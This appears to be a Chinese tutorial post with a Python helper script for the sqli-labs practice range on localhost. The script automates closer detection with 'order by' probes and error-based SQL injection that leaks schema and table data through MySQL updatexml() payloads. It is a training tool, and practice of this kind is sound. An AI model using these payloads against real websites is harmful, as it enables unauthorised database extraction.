order by：利用 order by 语句探测注入点的闭合方式（引号 / 括号组合），相当于判断闭合。
updatexml：利用 updatexml() 的 XPath 报错注入语句，在浏览器中打开页面查看报错回显中的结果。
all：相当于把上面两个模块依次执行（先判断闭合，再报错注入）。
关卡为 sqli-labs 靶场（脚本中路径名为 sqllab）的关卡。脚本中目标地址写死为本机 127.0.0.1 上的靶场，仅可用于自己搭建或已获授权的测试环境。
代码如下:
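"""Interactive helper for the sqli-labs ("sqllab") practice target.

The script builds SQL-injection probe URLs for a *local* lab instance
(hard-coded ``http://127.0.0.1/sqllab/Less-<N>/``) and hands them to the
system browser, so the operator reads the result in the rendered page:

* module 1 (order by)  - for every candidate closer in ``CLOSERS`` open an
  ``order by 1200`` probe and an ``order by 1`` probe; the closer whose first
  URL errors while the second renders normally is the right one.
* module 2 (updatexml) - ask for the closer, then repeatedly ask for a
  ``select`` body and open four updatexml() error-based URLs that leak the
  result in consecutive chunks.
* module 3 / any other answer (all) - module 1 followed by module 2.

Only use this against a lab you run yourself or are authorised to test.  The
payloads are sent exactly as printed, with no URL-encoding.

Changes from the original script: menus, closers and hints are tuples instead
of sets (a set iterates in hash order, so the menus and the closer probes used
to come out in a different order on every run); the URL that was opened is
printed instead of the repr of the ``webbrowser`` controller object; the
module code is factored into functions behind a ``__main__`` guard.
"""
import sys
import webbrowser

BASE_URL = "http://127.0.0.1/sqllab/Less-"
# Deliberately out-of-range column index: a closer is right when this probe
# errors while ``order by 1`` renders normally.
ORDER_BY_PROBE = 1200
# The updatexml prompt loop ends after this many queries or on input "0".
MAX_PROMPTS = 99
# substr() start offsets for one leaked value.  MySQL's XPATH error text only
# shows a window of roughly 32 characters including the leading ``^`` (0x5e),
# so each chunk carries 31 data characters and 1/32/63/94 tile a value of up
# to 124 characters.  Confirm the window size against your MySQL version.
CHUNK_OFFSETS = (1, 32, 63, 94)
SEPARATOR = "------------------------------------------------------"

# Tuples, not sets, so the menus print in a stable order.
MODULES = ("1 (order by)", "2 (updatexml)", "3 (all)")
LEVELS = ("1", "2", "3", "4", "5", "6")
# Candidate ways the injected ``id`` value may be quoted/bracketed in the query.
CLOSERS = ("'", "')", '")', '"', "'))", '"))')
# Hints printed before each updatexml prompt; "xxx" is for the operator to fill.
QUERY_HINTS = (
    "database()",
    'group_concat(table_name) from information_schema.tables where table_schema="xxx"',
    'group_concat(column_name) from information_schema.columns where table_schema="xxx" and table_name="xxx"',
    "group_concat(xxx,0x7e,xxx) from xxx",
    "group_concat(xxx) from xxx",
)

# Kept from the original script for compatibility; nothing here imports from it.
sys.path.append("libs")


def level_url(level: str, closer: str, payload: str) -> str:
    """Return ``<BASE_URL><level>/?id=1<closer><payload>``, un-encoded.

    No URL-encoding is applied on purpose: the trailing ``--+`` relies on the
    ``+`` reaching the server so it decodes to the space that ``--`` needs.
    """
    return f"{BASE_URL}{level}/?id=1{closer}{payload}"


def order_by_urls(level: str, closer: str) -> tuple[str, str]:
    """Return the (should-error, should-succeed) order-by probe pair for *closer*."""
    return (
        level_url(level, closer, f"order by {ORDER_BY_PROBE} --+"),
        level_url(level, closer, "order by 1 --+"),
    )


def updatexml_url(level: str, closer: str, query: str, offset: int) -> str:
    """Return an updatexml() error-based URL leaking ``select <query>`` from *offset*."""
    payload = (
        f" and updatexml(1,concat(0x5e,(substr((select {query}),{offset})),0x5e),1) --+"
    )
    return level_url(level, closer, payload)


def open_url(url: str) -> None:
    """Print *url* so the operator has a record of what was sent, then open it."""
    print(url)
    webbrowser.open(url)


def probe_closers(level: str) -> None:
    """Module 1: open both order-by probes for every candidate closer."""
    for closer in CLOSERS:
        for url in order_by_urls(level, closer):
            open_url(url)


def extract_loop(level: str) -> None:
    """Module 2: prompt for the closer, then for select bodies until "0" is entered."""
    closer = input("---请输入闭合--- :")
    for _ in range(MAX_PROMPTS):
        for hint in QUERY_HINTS:
            print(hint)
        print(SEPARATOR)
        query = input("(输入 0 停止)请输入sql注入语句 :")
        if query == "0":
            sys.exit(0)
        for offset in CHUNK_OFFSETS:
            open_url(updatexml_url(level, closer, query, offset))
        print(SEPARATOR)


def main() -> None:
    """Show the menus and dispatch to the chosen module."""
    for module in MODULES:
        print(module)
    choice = input("---请输入模块(最前方数字)--- :")
    for level in LEVELS:
        print(level)
    level = input("---请输入关卡--- :")
    # ``level`` is not validated, as in the original; it is only spliced into
    # the lab URL above.
    if choice == "1":
        probe_closers(level)
    elif choice == "2":
        extract_loop(level)
    else:
        # Any other answer (including "3") runs both modules in sequence.
        probe_closers(level)
        extract_loop(level)


if __name__ == "__main__":
    main()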